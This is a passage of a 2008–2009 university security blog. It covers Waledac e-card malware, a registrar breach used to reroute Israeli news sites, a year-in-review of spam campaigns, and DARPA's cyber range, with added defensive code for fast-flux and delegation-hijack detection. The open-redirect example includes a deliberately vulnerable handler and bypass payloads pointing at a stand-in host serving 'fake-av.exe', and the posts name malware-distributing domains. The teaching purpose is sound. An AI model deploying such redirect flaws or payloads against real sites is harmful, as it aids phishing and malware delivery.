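The two steps described above (watch one suspect domain resolve to many unrelated consumer IPs with short TTLs, then pivot through those IPs to find the sibling domains) can be scripted. The block below is an added example and is not code from the original post or from UAB; the observations it works on are a constructed, passive-DNS-style sample that reuses domains and IPs from the post but assumes the domain-to-IP pairings and the TTLs, and the "looks fluxy" thresholds are this example's own rule of thumb, not a published standard.

```python
"""Fast-flux indicators and pivoting through shared hosting IPs.

Added example, not code from the original post. OBSERVATIONS is a
constructed passive-DNS style sample: the domains and IPs echo the post,
the pairings and TTLs are assumptions made for this illustration.
"""
from collections import defaultdict
from ipaddress import ip_network

# (domain, ip, ttl_seconds) as a passive-DNS feed or repeated lookups would report them.
OBSERVATIONS = [
    ("youryearcard.com", "24.24.70.135", 180),
    ("youryearcard.com", "61.24.107.220", 180),
    ("youryearcard.com", "66.178.64.133", 180),
    ("youryearcard.com", "98.230.55.8", 180),
    ("youryearcard.com", "217.210.150.100", 180),
    ("bestyearcard.com", "61.24.107.220", 180),
    ("bestyearcard.com", "160.36.19.235", 180),
    ("superyearcard.com", "160.36.19.235", 180),
    ("superyearcard.com", "131.113.162.29", 180),
    ("livechristmascard.com", "131.113.162.29", 180),
    ("justchristmasgift.com", "24.24.70.135", 180),
    # A conventionally hosted control domain: one address, long TTL (assumed).
    ("example.org", "192.0.2.10", 86400),
]


def index_observations(observations):
    """Build domain->IPs, IP->domains and domain->lowest TTL lookups."""
    by_domain, by_ip, min_ttl = defaultdict(set), defaultdict(set), {}
    for domain, ip, ttl in observations:
        by_domain[domain].add(ip)
        by_ip[ip].add(domain)
        min_ttl[domain] = min(ttl, min_ttl.get(domain, ttl))
    return by_domain, by_ip, min_ttl


def flux_indicators(domain, observations):
    """Simple fast-flux indicators for one domain.

    Rule of thumb used here (an assumption of this example): many distinct
    IPs, spread over several unrelated /16 prefixes, served with a short
    TTL, is how a fast-flux front end behaves. A normally hosted site has
    a handful of addresses in one or two prefixes and a long TTL."""
    by_domain, _, min_ttl = index_observations(observations)
    ips = by_domain[domain]
    prefixes = {str(ip_network(f"{ip}/16", strict=False)) for ip in ips}
    ttl = min_ttl.get(domain)
    return {
        "distinct_ips": len(ips),
        "distinct_prefixes": len(prefixes),
        "min_ttl": ttl,
        "looks_fluxy": len(ips) >= 5 and len(prefixes) >= 4 and (ttl or 0) <= 600,
    }


def related_domains(seed, observations):
    """Pivot from a seed domain through shared IPs, transitively.

    Any domain that shares a hosting IP with the seed, or with a domain
    already pulled in, joins the cluster: the "what else do these hacked
    machines host?" step."""
    by_domain, by_ip, _ = index_observations(observations)
    cluster, frontier = {seed}, [seed]
    while frontier:
        current = frontier.pop()
        for ip in by_domain[current]:
            for other in by_ip[ip]:
                if other not in cluster:
                    cluster.add(other)
                    frontier.append(other)
    return sorted(cluster)


if __name__ == "__main__":
    print(flux_indicators("youryearcard.com", OBSERVATIONS))
    print(flux_indicators("example.org", OBSERVATIONS))
    print(related_domains("youryearcard.com", OBSERVATIONS))
```

In practice the observations come from repeated A-record queries over an hour or two (fast-flux domains rotate answers on every TTL expiry) or from a passive DNS source; the pivot is only as good as that history, so a domain that never happened to share an address in the sample window will be missed. Note that example.org never joins the cluster: sharing a single address with a victim network is not by itself evidence of relation, which is why the pivot should be applied to IPs already flagged as fluxing.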

The New Years site that we visited just now looks like this:



Although that looks like a website, it turns out the entire thing is a single file called "img.jpg". Clicking anywhere on the image causes the same result - you are prompted to download "postcard.exe".

postcard.exe is of course a virus. We submitted the virus to Virus Total, and got this Virus Total Analysis indicating that only 16 of 38 anti-virus products knew this was malware. Most of them called it either a version of "ElDorado", or gave it a new name of "Waledac", the latter being the name used by McAfee, Microsoft, and Symantec.

McAfee has a Nice Technical Report on what Waledac does, but basically it harvests all of the email addresses from your computer, sends them to one of many different machines, downloads some spam templates, and begins sending spam.

McAfee's report is from December 26th, and includes subject lines such as:

Merry Christmas greetings for you
You have received an Ecard
A Christmas card from a friend
Happy Xmas !

The domain names listed in the McAfee report of December 26th are all still live and all still distributing the current version of the virus, which has been modified many times since that report in order to evade detection. So, visiting:

justchristmasgift.com
or
yourdecember.com

gives you the same virus that visiting the current New Years domains would give you.

I know you are probably getting tired of this advice, but it still applies:

DO NOT CLICK ON LINKS IN EMAIL MESSAGES!!!

My malware team is still enjoying their vacation. If this is still a threat on Monday, we'll dig deeper to determine if the malware performs other actions.

In the meantime, Happy New Year!

Gary Warner
Director of Research
UAB Computer Forensics
The University of Alabama at Birmingham

Friday, January 02, 2009

Morocco based "Team Evil" reroutes prominent Israeli websites

After more than 10,000 websites were defaced in protest of Israeli actions in Gaza, the Morocco-based defacement team "Team Evil" has raised the cyber attack to a new level. By logging in to the domain registration services provider, Domain The Net Technologies, with the real credentials of the domain owners, the hackers were able to redirect traffic for several prominent Israeli websites, including that of YnetNews.com, a major Israeli English-language news website, and the website "www.israirairlines.com". This blogger also found evidence that the site "terrorism-info.org.il" was rerouted to the same location. Terrorism-info is a site presenting "Operation Cast Lead" from the Israeli point of view.

Anyone entering the actual address of YnetNews during this time would not be sent to the real webserver. Because the domain's delegation had been changed at the registrar, resolvers asked the attackers' nameserver for the address, and that nameserver answered with the address of another server displaying the hackers' message.

The website read:

Hacked by JURM-TEAM & CYBER-TERRORIST & TEAM-Evil

Lpooxd@gmail.com & Cyb3rt@hotmail.com

The Bitter Truth History repeats itself all the victims were said to words such as "terrorists" and the only reason for those words and that the overwhelming offender and murderer was a stronger force, but will not last, and the criminals will be rotting in hell and can not escape the punishment of God

Holocaust :Victims (the Palestinians) - the offender (the Zionists) # are still ongoing #
Holocaust :Victims (the Iraqis) - the offender (U.S. military) # are still ongoing #

There are many images that continue to occur, but you learn from history?!
* * *
The only solution for peace for all peoples in Palestine, Jews and Muslims and Christians is the demise of the Zionist and that the treatment of malignant cancer tumor
Look at the result of X-Ray for tumor, and they will learn that they do not want the peace, it is a dirty game of global
..... Machine Closed....................
........................................................................................................................................................................................................................................

We Are : Jurm / Cyber-terrorist / Dr.Noursoft / Dr.Win / Sql_Master / J3ibi9a / Scritpx // Fatna Bant Hmida

" Greetz : All Muslims Hackers "


(Images are not included above. The images included covered bodies, a scene from Abu Ghraib prison, a protestor with a sign against Zionism, and a series of maps showing the loss of land by Palestinians.)

During the attack, the YNetNews web address was being resolved by the nameserver "ns1.bestsecurity.jp". To its credit, YNetNews ran a story about the attack on its own website. Unfortunately both Lebanese and Israeli media sources have reported that the traffic was being rerouted to Japan. That is not correct: a hostname under .jp says nothing about where the machine is located. The IP address for ns1.bestsecurity.jp is 64.38.30.146, which is located on Fast Servers in Chicago, Illinois. The machine to which the traffic was being redirected, 64.38.30.147, was also at Fast Servers in Chicago, Illinois.

This is not the first time the YNetNews website has been hacked in response to Israeli actions. The website was also defaced back on July 5, 2008 by a hacker group calling itself "Jurm-Team". At that time the website showed a Syrian flag, and had a headline reading "Syria: End Israeli Aggression".

It had been speculated that such an attack would be performed with a stolen password for the domain owner's registration account; one common way to steal such a credential is to plant a trojan on a computer belonging to the target. The YNetNews story mentioned above, however, interviewed Yoav Keren, CEO of DomainTheNet Technologies, who confirmed that the Team Evil hackers had breached the registrar's own server and were able to find the passwords used by various domain registration customers, allowing the hackers to log in as the domain owners and re-route their DNS servers as described above. (The breach has since been closed.) Note the difference: a compromised customer PC exposes one domain, while a compromised registrar exposes every customer's domain at once.
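A domain owner cannot stop a registrar from being breached, but can notice within minutes that the delegation has changed. The following added example (not from the original post, and not YnetNews' or DomainTheNet's code) diffs a dig-style view of a domain's NS records and their addresses against a baseline the operators maintain. The domain news.example, its legitimate nameservers and their approved address range are assumptions; the rogue nameserver name and the two 64.38.30.x addresses repeat what the post reports; OBSERVED_DIG is a constructed answer section standing in for a live query. The check deliberately judges the nameservers by the addresses they resolve to, not by their hostname's TLD, which is the mistake behind the "rerouted to Japan" reports.

```python
"""Detect a hijacked delegation by diffing observed NS records against a baseline.

Added example, not part of the original post. news.example, its expected
nameservers and ns_prefixes are assumptions; OBSERVED_DIG is constructed.
"""
import ipaddress
import re

# Constructed dig-style answer section for a domain whose delegation was
# changed at the registrar. The rogue names/addresses are those in the post.
OBSERVED_DIG = """\
news.example.          3600  IN  NS  ns1.bestsecurity.jp.
news.example.          3600  IN  NS  ns2.bestsecurity.jp.
ns1.bestsecurity.jp.   3600  IN  A   64.38.30.146
ns2.bestsecurity.jp.   3600  IN  A   64.38.30.147
"""

# What the site's operators know their delegation should be (assumed values).
EXPECTED = {
    "ns": {"ns1.news.example", "ns2.news.example"},
    "ns_prefixes": [ipaddress.ip_network("198.51.100.0/24")],
}

# owner [trailing dot] TTL IN (NS|A) rdata [trailing dot]
_RR = re.compile(r"^(\S+?)\.?\s+\d+\s+IN\s+(NS|A)\s+(\S+?)\.?$")


def parse_records(text):
    """Pull NS and A records out of dig-style output.

    Returns {"ns": set of nameserver names, "a": {hostname: ip}}, names
    lower-cased and without trailing dots; other record types are ignored."""
    ns, a = set(), {}
    for line in text.splitlines():
        m = _RR.match(line.strip())
        if not m:
            continue
        owner, rtype, rdata = m.groups()
        if rtype == "NS":
            ns.add(rdata.lower())
        else:
            a[owner.lower()] = rdata
    return {"ns": ns, "a": a}


def check_delegation(expected, observed):
    """Return a list of findings; an empty list means the delegation matches.

    Three checks: nameservers we never authorised, authorised nameservers
    that vanished, and nameservers whose *address* falls outside the ranges
    the operators approved. Hostnames are not trusted as a location."""
    findings = []
    for name in sorted(observed["ns"] - expected["ns"]):
        findings.append(f"unexpected nameserver {name}")
    for name in sorted(expected["ns"] - observed["ns"]):
        findings.append(f"expected nameserver {name} no longer delegated")
    for name in sorted(observed["ns"]):
        ip = observed["a"].get(name)
        if ip is None:
            continue  # no glue seen; nothing to judge on this pass
        addr = ipaddress.ip_address(ip)
        if not any(addr in net for net in expected["ns_prefixes"]):
            findings.append(f"nameserver {name} resolves to {ip}, outside approved ranges")
    return findings


if __name__ == "__main__":
    for finding in check_delegation(EXPECTED, parse_records(OBSERVED_DIG)):
        print("ALERT:", finding)
```

Run on a schedule, the observed side should come from the parent zone (for example `dig +norec NS news.example @<a .example TLD server>`) rather than from the domain's own nameservers, since a hijacked delegation is precisely the case where the domain's own servers will lie. Detection is after the fact; the preventive controls are a registrar or registry lock on the domain and a credential for the registrar account that is used nowhere else.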

Thursday, January 01, 2009

2008: Looking back on a Year of Spam and Malware

Happy New Year! As we get ready for the New Year, there are quite a few security folks making predictions for 2009. I think my friend Dan Clemens covered that pretty well in his PacketNinjas Yearly Security Predictions. I'm going to limit myself to saying the criminals will continue to innovate, data breaches will become even more commonplace, and corporate America will continue to TALK about security without making the necessary fundamental changes to actually BE secure.

I'd rather spend this morning looking back on 2008, and some of the highlights that we discovered at UAB Computer Forensics as I and my staff spent the year analyzing spam, phishing, and malware and sharing what we found with you.

Last year we shared 102 Blog entries with you. Rather than tell you what *I* thought was most interesting, I thought I'd share with you what *YOU* seemed to think was the most interesting, based on the visits to each blog entry.

We'll hit these Top Ten Style . . . which means we start with . . .

Number Ten


Internet Landfill McColo Corporation


November 12, 2008

Perhaps one of the top accomplishments by "the good guys" this year was the closing of McColo. This story coined the term "Internet Landfill" to describe those networks which exist only to host trash, filth, and crime on the Internet. Championing journalist Brian Krebs led the charge, and the Internet should send him a big Thank You. Perhaps more important than shutting down McColo, which resulted in a two-thirds drop in spam volumes world-wide, was the proof that we CAN do something about spam if we work together.

Number Nine


Demise of Index1.php PornTube Video malware






Number Eight


Enom Phishing Continues


October 29, 2008

Both Enom and Network Solutions, two major domain registrars, had phishing campaigns against them back-to-back. We believe this led to quite a few domain takeovers later in the year, including that of financial services company CheckFree. Using the stolen userids and passwords of the people who rightly control the domain name information, criminals logged in and redirected dozens of domains to a server they controlled.


Number Seven


CNN Lends Authenticity to News Spam


August 7, 2008

After several weeks of fake news headlines tricking readers into clicking on links which infected their computer, the spammers got a huge boost in their infection rates when they began to imitate CNN.


Number Six


Anti-Virus Products Still Fail on Fresh Malware


August 12, 2008

Three examples in this blog showed that current anti-virus products fail miserably at detecting fresh malware. Some of our examples, "in the wild" as evidenced by us finding them in our spam, were detected by as few as 5 out of 36 anti-virus products tested.


Number Five


Governor Palin's Email Security Questions in the Facebook Age


September 22, 2008

When 20-year-old David Kernell broke into Governor Palin's Yahoo account by Googling up the answers to her security questions, we took a minute to point out how foolish this security practice is in this time when everyone's personal information is online.



Number Four


More than 1 Million Ways to Infect Your Computer


December 23, 2008

A criminal used malware to stuff thousands of websites with search terms that link through open redirectors on many well-known sites, including Microsoft.com and IRS.gov. As a result, many search terms showed up in Google with the number one hit being a trusted site's redirector, which sends the visitor on to a fake anti-virus that infects the computer.
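The redirector is the weak link in that chain: a trusted domain that will bounce a visitor to any URL named in a query parameter lends its reputation to whatever the attacker points it at. The block below is an added example, not code from the original post or from any of the sites it names; it puts the typical vulnerable handler beside a hardened one that accepts only same-site destinations. SITE_HOST and the values in EXAMPLE_TARGETS are constructed. The hardened check goes a little beyond the post's case and also covers the common bypasses (scheme-relative `//host`, backslashes, userinfo tricks, non-http schemes).

```python
"""Open redirector: the vulnerable form beside a hardened one.

Added example, not code from the original post or from any site it names.
SITE_HOST and EXAMPLE_TARGETS are constructed for illustration.
"""
from urllib.parse import urlsplit

SITE_HOST = "www.example.com"   # assumed: the host that serves the redirector


def vulnerable_redirect_target(param):
    """The typical open redirector: wherever ?url= points, the user is sent.

    Search engines index the redirector URL as belonging to the trusted
    site, which is exactly what the SEO-poisoning campaign exploited."""
    return param


def safe_redirect_target(param, site_host=SITE_HOST, fallback="/"):
    """Return param only if it stays on our own site, else fallback.

    Rejects absolute URLs to other hosts, scheme-relative //host forms,
    backslashes (browsers treat them as slashes), userinfo tricks such as
    https://www.example.com@evil.example/, and non-http schemes
    (javascript:, data:). Relative paths must start with one slash."""
    if not param:
        return fallback
    candidate = param.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme:
        # Absolute URL: only http(s), and only to exactly our host.
        # parts.hostname drops userinfo and port and is lower-cased.
        if parts.scheme in ("http", "https") and parts.hostname == site_host:
            return candidate
        return fallback
    if parts.netloc:
        return fallback            # "//evil.example/..." without a scheme
    if not candidate.startswith("/") or candidate.startswith("//"):
        return fallback            # require a single leading slash
    return candidate


# Constructed request values of the kind a ?url= parameter would carry.
EXAMPLE_TARGETS = [
    "/account/home",
    "//evil.example/fake-av.exe",
    "/\\evil.example/fake-av.exe",
    "http://evil.example/fake-av.exe",
    "https://www.example.com@evil.example/",
    "http:evil.example",
    "javascript:alert(1)",
    "https://www.example.com/help",
]


def compare(targets=EXAMPLE_TARGETS):
    """Map each target to (vulnerable destination, hardened destination)."""
    return {t: (vulnerable_redirect_target(t), safe_redirect_target(t)) for t in targets}


if __name__ == "__main__":
    for target, (weak, hardened) in compare().items():
        print(f"{target!r:42} weak -> {weak!r:42} hardened -> {hardened!r}")
```

Where a site genuinely needs to send users off-site (a partner login, a payment processor), the right shape is an allowlist of exact destinations keyed by an opaque token, not a host-name comparison on attacker-supplied input; the function above is the fallback for the far more common case where the redirect was only ever meant to land somewhere on the same site.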

Number Three


Storm Worm: Amero to replace Dollar?


July 22, 2008

Remember the Storm Worm? In July it pretended to be a warning that the US Dollar was being replaced by a gold coin. The continued popularity of this page actually has nothing to do with security. Rumor after rumor has circulated that the "Amero" proves that Bush was planning to merge Canadian, US, and Mexican currencies, and desperate tinfoil hat types keep Googling up my page.

Number Two


Computer Virus Masquerades as Obama Speech


November 5, 2008

A criminal who has been stealing userids and passwords since May gained perhaps his biggest collection yet when he created a fake Obama acceptance speech which was widely spammed the morning after the election. Anyone who visited the website to view the video would be trojaned and begin sending all of their login data to a computer in Ukraine. This same criminal ran dozens of spam and social engineering campaigns this year, primarily pretending to be a new "Digital Certificate" for your bank.

Number One


MSNBC "Breaking News" replaces CNN Spam Wave


August 13, 2008

One of the tricks the spammers used to get people to infect themselves was to promise to show them videos. We later found malware which actually searched real news sites to select headlines which were then stuffed into the spam messages to give the spam timely relevance to its readers. When the spam began imitating MSNBC's Breaking News alerts, even more people found themselves infected, causing their own computers to begin sending spam as well.

What does a National Cyber Range do?

This week Aviation Week ran a story called DARPA Unveils Cyber Warfare Range. The article quotes Rance Walleston, the director of BAE Systems' Information Operations Initiative:

“It’s hard to know what you are actually going to get from a test in a laboratory against five computers when the capability you need has to function against five million computers,” he continues. “There’s nowhere to test that, so DARPA’s trying to put together a range with fidelity in many dimensions — such as the number and types of nodes and how they’re connected — so that you can accurately determine the effectiveness of some tool. The real trick will be how quickly you can upgrade the range to deal with changing threats.”


If you are wondering, as I was, "what will that really look like?", the media has been all over the place with this one. InfoWar Monitor claimed "The agency's National Cyber Range for cyberwar simulation would be similar to Star Trek's holodeck or a Snow Crash-style Metaverse". Noah Schiffman wrote in his Security Phreak blog that the project would cost "an estimated $30 billion", and got Slashdotted quite a bit calling the project "Doomed to Failure". (Interesting that one project could cost $30 billion, when DARPA's entire appropriation for FY09 was a little over THREE billion; see Department of Defense Appropriation FY09: "The fiscal year 2009 budget request for DARPA is $3,285,569,000, an increase of $326,493,000, more than 10 percent, over the fiscal year 2008".)

I did a couple hundred pages of reading, so you, gentle reader, won't have to . . .

So how did this come about?



It started back in November 2007 with a call from DARPA's Michael VanPutte, who is the Program Manager of their Strategic Technology Office. They gave a two month comment period for people to describe what they thought a Cyber Range should do (see: Request for Information on Cyber Network Range Capabilities (CNRC)). Whatever responses they got were used to help decide what the requirements should be for a National Cyber Range, and the first pass of asking for proposals to build one was May 5, 2008. In that request, they asked for some quick responses (deadlined June 30, 2008) from people who might be able to build something like that. The idea was that they would fund several competing teams to see who could come up with something worthy of major long-term funding. A Proposers' Day Workshop was held on May 13-14, 2008 at the Hilton Washington Dulles, with a review of classified requirements the previous day at the Schafer Corporation for proposers.

The requirements that were shared that day boiled down to:

  • Conduct unbiased, quantitative and qualitative assessment of information assurance and survivability tools in a representative network environment.
  • Replicate complex, large-scale, heterogeneous networks and users in current and future Department of Defense (DoD) weapon systems and operations.
  • Enable multiple, independent, simultaneous experiments on the same infrastructure.
  • Enable realistic testing of Internet/Global-Information-Grid (GIG) scale research.
  • Develop and deploy revolutionary cyber testing capabilities.
  • Enable the use of the scientific method for rigorous cyber testing.


Proposers' Day gave a 2.5 hour briefing on the project, with proposers able to fill out Q&A cards, which were then addressed during the afternoon session.

The following day was for people who were looking for Team members to pitch what they had to offer and what they were looking for to build a successful proposal team.


The solicitation gave a number of objectives, including the ability to replicate and operate large-scale military and government network enclaves, commercial and tactical wireless and control systems, and a method of being able to rapidly prototype, deploy, monitor, and evaluate tests, new research protocols

The Solicitation boiled down to three phases:

Phase I - Design Objectives: Proposers had at most six months to produce a Preliminary Design Review showing an Initial Conceptual Design that could be developed into Detailed Engineering Plans and a workable Concept of Operations. Proposers who passed Phase I would receive funding to move into Phase II.

Phase II - Prototype Objectives: Proposers now have to do a few things:

Demonstration, to include:
- deploying two different host node recipes
- creating new recipes
- rapid testbed reconstruction
- test management
- time synch and auditing
- data collection tools, including packet captures, event log captures, malware event collection, and automated attacks
- a traffic generation system including incoming and outgoing email, automated port scanning, automated attacks, and simulated HTTP and other traffic
- human "replicants" who simulate the use of software products, browsers, media players and email clients
- replicated inter-enclave communication channels
- aggregating all sub-nodes into one large test bed
- dynamically freeing resources from one test and reassigning them to another

When it's all done, what will it be able to do?



Phase III: National Cyber Range Objectives:

One of the Phase II Demonstrators would be picked to fully deploy the National Cyber Range to meet the following objectives:

TASK 1 - INFRASTRUCTURE



Operational Resources - physical facilities, utilities, HVAC, security

Administration Resources - certification/accreditation, CONOP development, security management, test scheduling, operation of range processes

Demonstrations - facilities to demo for audiences of up to 30, with separate rooms for test control teams, Test Director, and OpFor (Oppositional Forces)

Node Replication - realistic replication of connections, hardware, and endpoints (firmware, hardware, software, apps)

Recipes - "a variety of node configurations" that would handle most potential operating environments

Network Technologies and Support - (make the network look like any network)

Protocols and Services - (allow the network to run any protocols)

Scalability - be able to deploy everything from single devices to tests incorporating several thousand nodes.

TASK 2 - RANGE MANAGEMENT



- Provide automated pre-test planning support
- Enable automated resource allocation based on needs and priorities
- Support both short (1 week) and long (6 month) research programs
- Provide a means to rapidly and securely de-obligate test resources after tests
- Enable free resources to be pooled and allocated to low priority, non-interactive, batch tests
- Provide a knowledge management suite for lessons learned (both within and across tests)
- Provide a means to incorporate additional technologies

TASK 3 - TEST MANAGEMENT



Facilitate the Test Director's activities by providing a palette of resources available, as well as products to assist in pre-test planning, test execution, data collection, post test analysis and closeout support.

Provide a knowledge management repository

Provide an automated means to configure, instrument, initialize, and verify assigned testbed resources

Provide means to execute, monitor, pause, continue, and stop tests.

Provide means to rapidly reset, modify and restart tests

Provide range validation with user-defined scripts

Support both interactive and batch testing paradigms

TASK 4 - TRANSPARENCY



Tests must be monitored for both quantitative and qualitative assessment, including instrumented monitoring and observer/controller evaluation and analysis

TASK 5 - QUALIFIED, ON-SITE SUPPORT TEAM



Provide a number of highly skilled, experienced network engineers, system administrators and domain administrators, with rapid response time and trouble ticketing system to track assistance requests.

TASK 6 - HUMAN INTERACTION AND REPLICATION



Allow players OR Automation, to fulfill the roles of:
- Oppositional Forces (OpFor), including both sophisticated cyber activity, defensive computing to protect national assets, and computer network attack, with facilities that can be controlled by OpFor isolated from Test Director's team.
- Team Integration
- Traffic Generators
- Human Actor Replicants and Program Activators (Host-based)



TASK 7 - EXTENSIBILITY



Deploy and/or replicate: LANs, WANs, wireless of all sorts, intermediate routing, C4 Systems (Military Command, Control, Communications, and Computers), US and foreign military communications infrastructures, including satellite, satcom, maritime, tactical, and Mobile Ad Hoc Networks (MANETs), and US and foreign military net-centric assets (including Unmanned Aerial Vehicles, Weapons, and Radar Systems)

TASK 8 - TIME DILATION/CONTRACTION



Develop technology to accelerate or decelerate test time relative to clock time

TASK 9 - ENCAPSULATION



Comply with all Security Classification Guidelines





WOW. OK, that sounds very cool. Where are we right now?

Some folks are already hiring to help build out their phase II. For instance, CTC: Senior Systems Engineer, and L-3 Global Security and Engineering Solutions: Senior Systems Engineer, which was just posted yesterday. The latter wants someone with 17 years experience (14 if you have a PhD) to:

Participate in development of the Concept of Operations and prepare Preliminary Design Review (PDR) for large scale, multi-level secure, multi-floor National Cyber Range (NCR.) Apply Cyber Security engineering and Computer Forensics technology in design of a test bed (Range) capable of supporting multiple, simultaneous, segmented tests of emerging and future defensive and offensive Cyber technology. Plan, organize and structure operations of the Range. Specify staff roles, technical skills, training and certifications required to meet operational requirements.

Manage layout and physical design of facility and development of Test & Evaluation (T&E) processes. Coordinate pre-approval of Range physical and information security certifications and procedures during PDR development.


Do you believe? It might be a great time to get a great job!

Link: NCR Proposers' Day Briefing